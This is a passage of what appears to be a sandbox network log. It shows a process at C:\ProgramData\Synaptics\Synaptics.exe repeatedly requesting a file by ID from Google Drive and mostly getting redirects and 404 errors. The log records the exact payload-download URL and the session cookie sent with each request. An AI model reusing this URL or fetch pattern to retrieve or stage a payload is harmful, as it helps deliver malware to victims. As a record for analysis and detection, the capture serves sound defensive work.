                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:56 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:56 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="HTar018hTKU4NpMvCw7RKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:56 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID: 99 | Source IP: 192.168.2.9 | Source Port: 49879 | Destination IP: 142.250.185.78 | Destination Port: 443 | PID: 7464 | Process: C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:57 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:57 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-klJy-VvPbjvN4YPAH8diAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID: 100 | Source IP: 192.168.2.9 | Source Port: 49878 | Destination IP: 142.250.185.78 | Destination Port: 443 | PID: 7464 | Process: C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:57 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:57 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DT2IbLqDrujHbFn_7s5QBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.9 | 49880 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:57 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.9 | 49882 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:57 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.9 | 49884 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:57 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-mLbzsuboBmFN_5ysyNq-ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.9 | 49883 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:57 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-VkAXNb2EnnrGRaCX2w-wLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.9 | 49885 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:58 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:58 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7moJQJ5z6Iadwrcn9eO-tScHtJwi302NMRpFc3DYyzErylAT0RF0glwHQPtmAvOrVG
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Vxg2Nnzn978BGN6fMtUsZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:58 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:58 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="DWveTKvlnnVWuLQ434iV4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:58 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.9 | 49886 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:58 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:58 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6mc2VWXMoauzpyKDVWXyEuRoMX97nSbAhQlcVxyvAWQFXFsRUa3PEX34zL4axQqnurfP0CfdA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:58 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-he0L_kENWUKRtxkpNs8jfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:58 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:58 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="Ye1HrDgyZicT55h1i_NdLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:58 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.9 | 49890 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:58 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YxJmAg036C6iw7HNXJ-t6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.9 | 49889 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:58 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-eVSJ9P-g24HWth88ZmH3hQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.9 | 49891 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:59 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:59 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC585exS7V1Z7JWd0tPOyjazb13Q59T52u4H4N39Nt8xgxigS2_cWQacv5BQ8FP8d2E0
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wtnUeU-rC78gT31l6dENfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:59 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:59 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="BOwNgwRcH53rsAAg2Kci2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:59 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.9 | 49892 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:59 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
